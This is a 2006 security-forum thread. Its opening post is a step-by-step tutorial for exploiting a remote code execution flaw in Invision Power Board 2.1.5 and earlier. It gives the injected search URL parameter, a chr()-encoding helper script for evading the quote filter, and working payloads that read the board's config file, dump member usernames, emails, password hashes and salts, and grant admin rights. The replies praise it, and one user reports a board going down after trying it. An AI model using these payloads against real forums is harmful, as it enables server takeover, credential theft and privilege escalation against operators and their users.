Government Security
Network Security Resources

Jump to content

Photo

Several Ways To Exploit Invision Power Board <= 2.1.5

- - - - - security server exploit vulnerability php sql mysql hash patch tutorial
  • Please log in to reply
5 replies to this topic

#1 crock

crock

    Private First Class

  • Members
  • 83 posts

Posted 26 June 2006 - 06:44 AM

Several ways to exploit Invision Power Board <= 2.1.5 using the vulnerability:
Invision Power Board <= 2.1.5 Multiple Vulnerabilities, Remote Code Execution
(evading quotes filtering technique) – written by crock

With this tutorial, I want you to understand how code can be executed even when quotes and other special characters are not allowed / filtered out.
I am using the latest IPB vulnerability as an example:


'exploit instructions' (from IceShaman & Wells - http://www.governmen...showtopic=20530 ):

- Post in a forum with "eval(die()); //" somewhere in the body of the post
- Use the search form to find text die just by your username (so only one result shows)
make sure "Show results as posts" is selected.
- Append to the URL at the top &lastdate=z|eval.*?%20//)%23e%00 and press return
- The code should have been executed

In the example above, die() is the php-code being executed.
die() just stops code from being executed, giving us a blank page in this example.

What else can be executed?

01. Execute an external program
02. Getting the usernames/hashes/salts
03. Giving a user admin rights


01. Execute an external program:
using php-function passthru();
example: passthru("cat conf_global.php"); would read the config file of the board.

But... the problem is that this code has to be posted in a thread on the forum.
When posting something, quotes " are replaced by & quot (more info on this: http://www.w3.org/Ma...mlplus_13.html)

So posting eval(passthru("cat conf_global.php"); ); // on the board is going to be a problem.
In fact everything that gets parsed by eval() should be a string.
So we need to formulate the string passthru("cat conf_global.php"); in some way, without using the quotes.
The only way I can think of is by using the php function chr()

from php.net:
string chr ( int ascii )
Returns a one-character string containing the character specified by ascii


I wrote a little php script to help with that.
<html>
	<head>
		<title>Convert String To PHP ASCII in PHP chr() function</title>
	</head>
	<body>
		<b>Convert String To PHP ASCII in PHP chr() function:</b><br /><br />
		<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="get">
			<textarea name="s" rows="20" cols="100"></textarea>
			<input type="submit">
		</form>
		<br />	
		
		<?php
		$string = stripslashes($_GET['s']);	
		$chrstring = "";
		for ($i=0; $i < strlen($string); $i++)
		{
			$chrstring .= "chr(" . ord(substr($string,$i,1)) . ")";
			$chrstring .= ($i==strlen($string)-1)?"":".";		
		}	
		
		$toscreenstring = htmlentities($string);
		
		echo "<b>Converted:</b><br />$toscreenstring<br /><b>To:</b><br />$chrstring<br /><br />-";	
		?>
	</body>
</html>

passthru("cat conf_global.php");
should look like this:
chr(112).chr(97).chr(115).chr(115).chr(116).chr(104).chr(114).chr(117).chr(40).
chr(34).chr(99).chr(97).chr(116).chr(32).chr(99).chr(111).chr(110).chr(102).chr(
95).chr(103).
chr(108).chr(111).chr(98).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).ch
r(34).chr(41).chr(59)

To parse this code using the exploit, the following should be posted in the forum:

eval(chr(112).chr(97).chr(115).chr(115).chr(116).chr(104).chr(114).chr(117).chr(40).
chr(34).chr(99).chr(97).chr(116).chr(32).chr(99).chr(111).chr(110).chr(102).chr(
95).chr(103).
chr(108).chr(111).chr(98).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).ch
r(34).chr(41).chr(59)
); //
and some words that are unique on the board

Using the exploit from IceShaman:
- Use the search form to find your unique words (so only one result shows)
make sure "Show results as posts" is selected.
- Append to the URL at the top &lastdate=z|eval.*?%20//)%23e%00 and press return
- The contents of conf_global.php is now displayed on the page.
You should check the source code of the page to view the output of the passthru() function.



02. Getting the user data (usernames, hashes, salts, …)

In Invision Power Board, the user data (username, e-mail address) is stored in the table: prefix_members
The hashes are stored in the table: prefix_members_converge

The boards' prefix can be found in the conf_global.php file. This can be retrieved using the previously described method or it can simply be retrieved with the following php code:
include('conf_global.php');
$fprefix = $INFO['sql_tbl_prefix'];

This code retrieves the id,name,email,pass_hash,pass_salt from the 2 tables mentioned before:

include('conf_global.php');
$fprefix = $INFO['sql_tbl_prefix'];

echo "id,name,email,pass_hash,pass_salt";
$sql = "SELECT * FROM ".$fprefix."members, ".$fprefix."members_converge WHERE ".$fprefix."members.id = ".$fprefix."members_converge.converge_id";
$result = mysql_query($sql) or die(mysql_error());
while ($row = mysql_fetch_array($result)){
	echo $row['id'].",".$row['name'].",".$row['email'].",".$row['converge_pass_hash'].
",".$row['converge_pass_salt']."<br>";
}
echo "<noscript>";

This code cannot be executed using the exploits because of the special characters ( “ ; ‘ $) it contains.
The same method described in the first section (01. Execute an external program), can be used to give us the following chr() functions, witch form a string:

chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(40).chr(39).ch
r(99).chr(111).
chr(110).chr(102).chr(95).chr(103).chr(108).chr(111).chr(98).chr(97).chr(108).ch
r(46).chr(112).
chr(104).chr(112).chr(39).chr(41).chr(59).chr(13).chr(10).chr(36).chr(102).chr(1
12).chr(114).
chr(101).chr(102).chr(105).chr(120).chr(32).chr(61).chr(32).chr(36).chr(73).chr(
78).chr(70).
chr(79).chr(91).chr(39).chr(115).chr(113).chr(108).chr(95).chr(116).chr(98).chr(
108).chr(95).
chr(112).chr(114).chr(101).chr(102).chr(105).chr(120).chr(39).chr(93).chr(59).ch
r(13).chr(10).
…
[truncated]

Using the method described in section 01, this code can be executed on the board.

03. Giving a user admin rights

The following code should set your USERNAME to admin:

include('conf_global.php');
$fprefix = $INFO['sql_tbl_prefix'];
mysql_query("UPDATE ".$fprefix."members SET  mgroup='4' WHERE name=USERNAME");

I am not going to explain everything again.
This code can be executed using the methods described in the previous sections.

Conclusions:
Because the vulnerability has been patched on most boards, I felt it was a good time to write a tutorial about it. With this information, you will understand the technique used to evade the character filters and probably something about the IPB database structure.

btw,
…I am not responsible for any damage you do with this tutorial
…use it wisely


Crock,

Attached Files



#2 aelphaeis_mangarae

aelphaeis_mangarae

    Members

  • Sergeant Major
  • 973 posts

Posted 26 June 2006 - 05:38 PM

When I saw this I expected it to be a tutorial written by some script kiddie.

Best tutorial I have seen on using an exploit and understanding how it works (maybe the only one I have seen...)0

Good job :)

I think it's good you waited before publishing this tutorial.

#3 warzone

warzone

    Private

  • Members
  • 7 posts

Posted 26 June 2006 - 06:16 PM

I posted eval(die()); // and tried searching for die, but there needs to be at least 4 char. one minute later the board was down! Does this have anything to do with the code?

#4 Tec

Tec

    Specialist

  • Members
  • 117 posts

Posted 26 June 2006 - 06:46 PM

I've gotta agee with aelphaeis_mangarae on this one. It was excellently written and shows respect for security, privacy, and the art in general. Thanks, nice work.
In the end, I became them and led them--
after all, none of us really qualified as humans.
We were hardworn, automatic, and as hollow as the 'O' in God.
I reattached my emotions, cellular and narcotic;
from the top of Hollywood is looked like space:
Millions of capsules and mechanical animals..
A city filled with dead stars and a girl I called Coma White.
This is my Omega.


.:Post-Somatic Studios - Web/Graphic Design

(-Digital Spirit Media - Biomedical Solutions

#5 crock

crock

    Private First Class

  • Members
  • 83 posts

Posted 29 June 2006 - 03:12 AM

thank you all for the positive replies,
I've added a pdf version of it

#6 Jeremy

Jeremy

    Commander in Chief

  • Retired Admin
  • 2,459 posts

Posted 30 June 2006 - 01:45 PM

Great Tutorial. Archived, with link left in Tutorial forum.





Also tagged with one or more of these keywords: security, server, exploit, vulnerability, php, sql, mysql, hash, patch, tutorial